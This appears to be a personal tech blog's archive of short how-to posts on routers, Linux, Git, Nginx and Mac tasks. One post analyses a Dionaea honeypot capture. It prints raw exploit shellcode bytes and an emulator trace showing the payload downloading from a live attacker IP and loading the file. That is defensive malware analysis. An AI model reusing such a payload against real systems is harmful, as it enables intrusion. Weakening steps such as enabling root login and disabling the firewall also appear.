Category Archives: technique

Upgrade Python packages using pip

As the title says, here is how to update your Python packages via pip:

for Linux/*nix:

pip freeze --local | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U

p/s: you may need to run as sudo. Probably.

for Windows:

for /F "delims===" %i in ('pip freeze -l') do pip install -U %i

Credit: http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

Recover bricked TL-MR3020 via serial console


Recently, I flashed my MR3020 in an attempt to make my own Wifi Pineapple. But.. you know. Shit happens. :p

In other words, I screwed up my MR3020 and bricked it. All the LEDs keep blinking, some are on and not blinking, and the network keeps getting connected and disconnected randomly. Guess that’s a sign you’ve messed up the device. XD

But I’m lucky, because you can still recover the device via the serial console and tftpd32 method. (yeay!)

Bear in mind that this method will VOID your warranty. So, don’t do this unless you are willing to sacrifice it for the sake of knowledge. 🙂

Things that you need:

  • Tftpd32: A free tftp and dhcp server for windows, freeware tftp server. Very efficient for booting over LAN.
  • PuTTY: SSH and telnet client, free and open-source terminal emulator, serial console and network file transfer application.
  • USB to UART converter (3.3V). I’m using this converter that I bought at Cytron Technologies.
  • A 10K resistor
  • Female to Female OR Female to Male Jumper Wires

UC00B USB-UART Converter


So, as you can see, my USB-UART converter comes with a 6-way header pin for interfacing. The voltage selector must be set to 3.3V since the TL-MR3020 router has its I/O pins working at 3.3V.

Connection Diagram
* Do not connect the router VCC to USB-UART VCC, it may break your adapter or your router

TL-MR3020   |    USB-UART   |    COLOR
------------|---------------|-----------
GND         |    GND        |    BLACK
RX          |    TXD        |    GREEN
TX          |    RXD        |   YELLOW

For the picture of the connection diagram, refer to first picture above.

No Serial Port
So, in my case, my MR3020 is version 1.9. As you can see in the picture above, mine doesn’t have any serial port to connect to using a female jumper wire. So I use female (attached to the USB-UART) to male (attached to the MR3020) wires, as in the picture below:
Male Jump Wire to MR3020
Take note that I only put the resistor and jumper wire in place without soldering. You can solder your jumper wire and resistor to the port, but in this tutorial I skip that. :p

After you have everything in place, you can install the UC00B (USB-UART) driver on your computer. After it finishes, restart your computer and check your Device Manager. You should see something like this:

UC00B USB-UART on Device Manager


which indicates that the converter is detected by the computer and the driver is properly installed.

Setting up network IP address
Assign a static IP address to the computer, using IP address 192.168.1.2 since the router IP address is 192.168.1.1. No need for Internet connection in this process.

REMEMBER! Ensure that you have disabled your Windows firewall, or else the next step might not work.

Install OpenWRT from the U-Boot console
Download the latest OpenWRT firmware and save it to C:\Program Files\Tftpd32 (Tftpd32 default installation folder) as shown in figure below:

TFTPD


You also can click the “Show Dir” button and check if the file is there or not.

Run Putty and select the Serial option. For Serial Line, I’m using COM3 since my USB-UART converter is detected as COM3; for Speed, I use 115200. Then click Open, as in the picture below:

Putty example for Serial COM3

After that, power up your MR3020. On Putty console, you should see something like this:

U-Boot 1.1.4 (Aug 17 2012 - 15:21:03)
.
AP121 (ar9330) U-boot
.
DRAM:  32 MB
led turning on for 1s...
id read 0x100000ff
flash size 4194304, sector count = 64
Flash:  4 MB
Using default environment
.
In:    serial
Out:   serial
Err:   serial
Net:   ag7240_enet_initialize...
No valid address in Flash. Using fixed address
No valid address in Flash. Using fixed address
: cfg1 0x5 cfg2 0x7114
eth0: 00:03:7f:09:0b:ad
ag7240_phy_setup
eth0 up
: cfg1 0xf cfg2 0x7214
eth1: 00:03:7f:09:0b:ad
athrs26_reg_init_lan
ATHRS26: resetting s26
ATHRS26: s26 reset done
ag7240_phy_setup
eth1 up
eth0, eth1
Autobooting in 1 seconds

The moment you see “Autobooting in 1 seconds”, type the word “tpl” immediately.

tpl
hornet>

If everything is correct, you should see “hornet>” in your console. If you missed it, close and reopen Putty and follow the instructions above until you see “hornet>”.

Now you are in the U-Boot console, as shown by “hornet>” on your console. Enter the following commands, where:
setenv ipaddr sets the MR3020 IP address,
setenv serverip sets the computer IP address.

hornet> setenv ipaddr 192.168.1.1
hornet> setenv serverip 192.168.1.2

Then enter this command to download openwrt .bin file:

tftpboot 0x80000000 openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin

you should see something like this:

hornet> tftpboot 0x80000000 openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin
Using eth1 device
TFTP from server 192.168.1.2; our IP address is 192.168.1.1
Filename 'openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin'.
Load address: 0x80000000
Loading: #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         #################################################################
         ######################################################
done
Bytes transferred = 3932160 (3c0000 hex)

Then enter this command to erase old firmware:

erase 0x9f020000 +0x3c0000

The output must be like this:

hornet> erase 0x9f020000 +0x3c0000
.
First 0x2 last 0x3d sector size 0x10000           61
Erased 60 sectors

Then enter this command to start flashing:

cp.b 0x80000000 0x9f020000 0x3c0000

And the output is:

hornet> cp.b 0x80000000 0x9f020000 0x3c0000
Copy to Flash... write addr: 9f020000
done

After that, let’s try to boot into the new firmware:

bootm 9f020000

And the result is:

hornet> bootm 9f020000
## Booting image at 9f020000 ...
   Uncompressing Kernel Image ... OK
.
Starting kernel ...
### snip ###

And.. that’s it. You’ve brought your almost-dead MR3020 back to life! 🙂
The device’s new IP is 192.168.1.1. Happy hacking!

  • Credit to this blog for this tutorial.
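The erase and copy lengths in the session above have to match the image that was transferred, and TFTP itself does no integrity checking. The following is an added example (not part of the original tutorial) that checks an image against a digest and derives the U-Boot commands from its size; the `MAX_LEN` limit and the idea that a SHA-256 digest is published for the image are assumptions.

```python
import hashlib

# Addresses and sizes taken from the U-Boot session on this page.
LOAD_ADDR = 0x80000000   # RAM buffer used by tftpboot
FLASH_ADDR = 0x9F020000  # start of the firmware region
SECTOR = 0x10000         # "sector size 0x10000" in the erase output
MAX_LEN = 0x3C0000       # assumption: never erase more than the page does


def verify_image(data: bytes, expected_sha256: str) -> None:
    """TFTP has no integrity check: compare with the digest published for the image."""
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected_sha256.strip().lower():
        raise ValueError(f"SHA-256 mismatch: got {actual}")


def flash_plan(image_name: str, image_size: int) -> list:
    """Return the U-Boot commands for an image of image_size bytes."""
    if image_size <= 0:
        raise ValueError("empty image")
    # erase works on whole sectors, so round the length up to a sector boundary
    erase_len = -(-image_size // SECTOR) * SECTOR
    if erase_len > MAX_LEN:
        raise ValueError(f"image needs {erase_len:#x} bytes of flash, limit {MAX_LEN:#x}")
    return [
        "setenv ipaddr 192.168.1.1",
        "setenv serverip 192.168.1.2",
        f"tftpboot {LOAD_ADDR:#x} {image_name}",
        f"erase {FLASH_ADDR:#x} +{erase_len:#x}",
        f"cp.b {LOAD_ADDR:#x} {FLASH_ADDR:#x} {image_size:#x}",
        f"bootm {FLASH_ADDR:#x}",
    ]


if __name__ == "__main__":
    image = b"\xff" * 3932160  # constructed stand-in with the size from the transfer above
    verify_image(image, hashlib.sha256(image).hexdigest())
    name = "openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin"
    print("\n".join(flash_plan(name, len(image))))
```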

WordPress HTTP error on image upload (Nginx)

HTTP Error during image upload on wordpress

Recently, I’ve encountered this kind of problem. Maybe because it has been a while since I uploaded any images to my posts. :p

Anyway, if you run into this kind of error and are using Nginx as your web server, here is how to solve it.

Add:

client_max_body_size 100m;

to your nginx .conf file.

For example, mine looks something like this:

server {
        listen 80;
        root /usr/share/nginx/www;
        index index.php index.html index.htm;
#
        fastcgi_buffers 8 16k;
        fastcgi_buffer_size 32k;
        fastcgi_read_timeout 180;
        client_max_body_size 100m;
#
        location / {

Hope it helps. 🙂

Credit to aaronjholbrook

Disable IPv6 on Ubuntu

If you want to disable IPv6 on your server, below are the steps to do it.

  1. Edit this file:
nano /etc/sysctl.conf
  2. Add these lines to the bottom of the file:
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
  3. Run this command on your terminal:
sudo sysctl -p

Done!

Enable graphical root login on ubuntu 12.04

In Ubuntu, the user “root” won’t show up as an option at the login screen, so you need to adjust Ubuntu to allow login as “root”.

Run the commands below in your terminal (as a normal user with sudo):

sudo passwd root
sudo sh -c 'echo "greeter-show-manual-login=true" >> /etc/lightdm/lightdm.conf'

Reboot, and then you should be able to log in as root using the graphical login.

Setting locale failed on Mac OS X Mavericks

If you are using Mac OS X (in my case, I’m using Mavericks), during an SSH session you may see this kind of error in your terminal:

perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
    LANGUAGE = (unset),
    LC_ALL = (unset),
    LANG = "en_US.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").

To solve this, edit the .bash_profile file on your host/local machine:

nano ~/.bash_profile

and add these lines:

export LC_CTYPE=en_US.UTF-8
export LC_ALL=en_US.UTF-8

CREDIT TO : Agile Faqs

Dionaea simple analysis

Dionaea exploit analysis

For this analysis, we’ll use the python3 that is bundled with Dionaea:

/opt/dionaea/bin/python3

Running the command above will open a Python console. Enter the code below line by line:

f = open('/tmp/test.bin','wb+')
f.write(b'\\\x00EJinvSWwBRCQvkpxpigFPYgLEznJUFvXdgKGNqynVDlchFrVWzDhuvssAiCzTVCXwMERZNFfiqOpAyLjJojswpKHzIwBaYQMAxYe\xe8\xff\xff\xff\xff\xc2_\x8dO\x10\x801\xc4Af\x819MSu\xf58\xae\xc6\x9d\xa0O\x85\xeaO\x84\xc8O\x84\xd8O\xc4O\x9c\xccIse\xc4\xc4\xc4,\xed\xc4\xc4\xc4\x94&<O8\x92;\xd3WG\x02\xc3,\xdc\xc4\xc4\xc4\xf7\x16\x96\x96O\x08\xa2\x03\xc5\xbc\xea\x95;\xb3\xc0\x96\x96\x95\x92\x96;\xf3;$i\x95\x92QO\x8f\xf8O\x88\xcf\xbc\xc7\x0f\xf72I\xd0w\xc7\x95\xe4O\xd6\xc7\x17\xcb\xc4\x04\xcb{\x04\x05\x04\xc3\xf6\xc6\x86D\xfe\xc4\xb11\xff\x01\xb0\xc2\x82\xff\xb5\xdc\xb6\x1fO\x95\xe0\xc7\x17\xcbs\xd0\xb6O\x85\xd8\xc7\x07O\xc0T\xc7\x07\x9a\x9d\x07\xa4fN\xb2\xe2Dh\x0c\xb1\xb6\xa8\xa9\xab\xaa\xc4]\xe7\x99\x1d\xac\xb0\xb0\xb4\xfe\xeb\xeb\xf5\xfc\xfc\xea\xf6\xf0\xf1\xea\xf7\xf6\xea\xf6\xf5\xf4\xfe\xfc\xf5\xf0\xf3\xeb\xaf\xa7\xa2\xa8\xc4MSemnHqZkZyHIFmbZQCywHscutahhWhoSewiPdNFaPfofpeZVQgyybFqBlGSeBYAPgirfoIOMFQCVIOhuNxscDcxyqJfxgMhahsgjEvYZWarkAkGUWFEWHrnRvYCubVUJnOgsKyupLJGkVCRQwYGcQPSuIsYJmBSVIcLnDXRxnDOkAvmXjHktND\\\x00.\x00.\x00\\\x00.\x00.\x00\\\x00A\x00I\x00O\x00J\x00L\x00P\x00D\x00\x08\x04\x02\x00$\xcb\x01xVFAS$\xcb\x01xSNKBQTVPYYTZISATHHFZEPMNQBWWBDGZDXJNVJAZLX\x92J$\xb6\x97\x03\xf57\xebZRQNXKFGQWT\x00\x00')
f.close()
exit()

It will produce a test.bin file in the /tmp/ folder.

Now we analyze it and dump the output to another file:

/opt/dionaea/bin/sctest -S -g -v -s 1000000 < /tmp/test.bin >> test.txt

You should see something like this:

[email protected]:~# cat test.txt
verbose = 1
success offset = 0x00000068
[emu 0x0xac40e0 info ] The following function is a stub instr_sldt_0f00 functions/misc.c:290
<snip>
Hook me Captain Cook!
userhooks.c:132 user_hook_ExitThread
ExitThread(0)
stepcount 85067
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417116 =>
           = "urlmon";
) = 0x7df20000;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x00417121 =>
           = "http://188.245.32.210:8147/kcfl";
     LPCTSTR szFileName = 0x00416fbe =>
           = "x.";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00416fbe =>
           = "x.";
) = 0x00000000;
void ExitThread (
     DWORD dwExitCode = 0;
) =  0;

As you can see, the malicious URL is hxxp://188.245.32.210:8147/kcfl

Reference : https://sourceforge.net/p/nepenthes/mailman/message/26862416/
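Reading the URL out of the trace by eye does not scale past a handful of captures. The following is an added example (not from the original post or from Dionaea) that parses the API-call blocks in sctest output and reports each download URL defanged, the dropped file name, and whether that file is later passed to LoadLibraryA; the function names are made up for this sketch and the trace is an excerpt of the output shown above.

```python
import re

# Trace excerpt copied from the sctest output shown above.
TRACE = '''\
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417116 =>
           = "urlmon";
) = 0x7df20000;
HRESULT URLDownloadToFile (
     LPCTSTR szURL = 0x00417121 =>
           = "http://188.245.32.210:8147/kcfl";
     LPCTSTR szFileName = 0x00416fbe =>
           = "x.";
) =  0;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00416fbe =>
           = "x.";
) = 0x00000000;
'''

CALL_START = re.compile(r"^\w+\s+(\w+)\s+\($")  # "HRESULT URLDownloadToFile ("
PARAM = re.compile(r"^\s+\w+\s+(\w+)\s*=")      # "  LPCTSTR szURL = 0x... =>"
STRING = re.compile(r'^\s+=\s+"(.*)";$')        # '  = "urlmon";'

def parse_calls(trace):
    """Return [(api_name, {param: string_value})] in call order."""
    calls, args, param = [], None, None
    for line in trace.splitlines():
        if m := CALL_START.match(line):
            args, param = {}, None
            calls.append((m.group(1), args))
        elif args is None or line.startswith(")"):
            args = None                          # outside a call block
        elif m := PARAM.match(line):
            param = m.group(1)
        elif (m := STRING.match(line)) and param:
            args[param] = m.group(1)
    return calls

def download_iocs(calls):
    """Defanged URL, dropped file name, and whether the file is later loaded."""
    iocs = []
    for i, (api, args) in enumerate(calls):
        if api == "URLDownloadToFile" and "szURL" in args:
            dropped = args.get("szFileName")
            loaded = any(a == "LoadLibraryA" and p.get("lpFileName") == dropped
                         for a, p in calls[i + 1:])
            iocs.append({"url": args["szURL"].replace("http", "hxxp", 1),
                         "file": dropped, "loaded": loaded})
    return iocs
```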

Remove .svn folder from Github repo

For those who are using Github and pushing their code via terminal, you may encounter a problem where you see a folder named .svn in each folder of your code.

So if you want to delete these folders, follow the steps below:

First, pull your code from Github to your computer:

git pull origin master

Then, use this command to find folder .svn and delete it:

find . -name '.svn' | xargs git rm -rf --ignore-unmatch

Last, commit the removal and push your code back to the Github server:

git commit -m "Remove .svn folders"
git push origin master

ODROID U2 – Flashing Images on Mac OS X

  1. Download the image of the OS you want to boot on your ODROID to the local disk of your Mac

  2. If the Image is compressed, unpack it (if it is in ‘.xz’ format you need a tool like The Unarchiver to be able to unpack it)

  3. Insert your SD card and check the currently mounted filesystems

gh0st:Downloads zer0$ df -h
Filesystem      Size   Used  Avail Capacity  iused    ifree %iused  Mounted on
/dev/disk0s2   371Gi  270Gi  100Gi    73% 70913436 26254530   73%   /
devfs          200Ki  200Ki    0Bi   100%      694        0  100%   /dev
map -hosts       0Bi    0Bi    0Bi   100%        0        0  100%   /net
map auto_home    0Bi    0Bi    0Bi   100%        0        0  100%   /home
/dev/disk1s1   7.4Gi  2.5Mi  7.4Gi     1%        0        0  100%   /Volumes/UNTITLED

*Note the name of the filesystem that Mac OS X assigned to the mounted SD card (in my case /dev/disk2s1)

  4. Unmount that filesystem so that you will be allowed to overwrite the disk:
gh0st:Downloads zer0$ sudo diskutil unmount /dev/disk1s1
Volume UNTITLED on disk1s1 unmounted
  5. Using the device name of the filesystem, work out the raw device name for the entire SD card by omitting the final “s1” and replacing “disk” with “rdisk” (Important: you will lose all data on the hard drive on your computer if you get the wrong device name). Make sure the device name is the name of the whole SD card as described above, not just a partition of it (for example, rdisk3, not rdisk3s1). Similarly, you might have another SD drive name/number like rdisk2 or rdisk4, etc.; recheck by using the df -h command both before & after you insert your SD card reader into your Mac if you have any doubts!
    In my case, since the device name of the mounted filesystem is /dev/disk2s1 the entire SD card has the device name /dev/rdisk2

  6. Write the image to the card with the dd command, using the raw disk device name from above (read the above step carefully, to be sure you use the correct rdisk# here!)

gh0st:Downloads zer0$ sudo dd bs=1m if=odroid-debian-wheezy-u2.img of=/dev/rdisk1
7260+0 records in
7260+0 records out
7612661760 bytes transferred in 709.578823 secs (10728423 bytes/sec)

*(note that dd will not output any information until there is an error or it is finished)

  7. When dd finishes successfully, it will display some information and the SD card will be re-mounted. You can now eject the card:
gh0st:Downloads zer0$ sudo diskutil eject /dev/rdisk1
Disk /dev/rdisk1 ejected
  8. Remove the SD card from the card reader and put it in the ODROID to boot your new OS image

Extract unique IP address from Apache & Nginx log file

Let’s say you want to count the number of unique IP addresses hitting your Apache server. It’s very easy to do in a Linux (or compatible) shell. In this tutorial, I’m using Ubuntu server.

First, locate the log file that you want to extract. For example, apache2 log file is located at /var/log/apache2 (depending on your distro). For nginx, the log file is located at /var/log/nginx.

Here is the first example: how to extract and count unique IP addresses in an Nginx log file.

Nginx Access Log file

Nginx Error Log file

Next are the steps to extract and count unique IP addresses from an Apache log file.
Apache access & error log file

Apache Access Log file

Apache Error Log file
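One way to do the extraction and count described above for both servers, as an added example that is not from the original post: access logs put the client address first, while error logs embed it (`client: …` in Nginx, `[client …:port]` in Apache 2.4). The log lines are constructed samples and the function names are made up for this sketch.

```python
import ipaddress
import re
from collections import Counter

# Access logs (Apache and Nginx "combined" format) start with the client address.
ACCESS = re.compile(r"^(\S+) \S+ \S+ \[")
# Error logs carry it later in the line.
NGINX_ERR = re.compile(r"client: ([^,\s]+)")       # "..., client: 203.0.113.9, server: ..."
APACHE_ERR = re.compile(r"\[client ([^\]\s]+)\]")  # "[client 192.0.2.44:51234]"

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.9 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 612 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:37 +0000] "GET /a HTTP/1.1" 404 153 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:38 +0000] "POST /login HTTP/1.1" 302 0 "-" "curl/8.0"',
    '2023/10/10 13:55:40 [error] 812#0: *7 open() "/usr/share/nginx/www/x" failed '
    '(2: No such file or directory), client: 203.0.113.9, server: _, request: "GET /x HTTP/1.1"',
    '[Tue Oct 10 13:56:01.123456 2023] [core:error] [pid 911] [client 192.0.2.44:51234] '
    'AH00126: Invalid URI in request GET /%zz HTTP/1.1',
    'not a log line',
]


def _as_ip(text):
    """Normalised address string if text is a valid IPv4/IPv6 address, else None."""
    try:
        return str(ipaddress.ip_address(text))
    except ValueError:
        return None


def client_ip(line):
    """Return the client address of one access or error log line, or None."""
    for pattern in (ACCESS, NGINX_ERR, APACHE_ERR):
        m = pattern.search(line)
        if m:
            # Apache 2.4 appends ":port"; retry without it if the raw value is not an IP.
            ip = _as_ip(m.group(1)) or _as_ip(m.group(1).rpartition(":")[0])
            if ip:
                return ip
    return None


def unique_ips(lines):
    """Count log lines per unique, validated client address."""
    return Counter(ip for ip in map(client_ip, lines) if ip)
```

Feed it a real file with `unique_ips(open("/var/log/nginx/access.log"))`; `len()` of the result is the number of unique addresses and `.most_common(10)` lists the busiest clients.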

If you have any other steps, you can share them with me in the comment section. Hope it helps! 🙂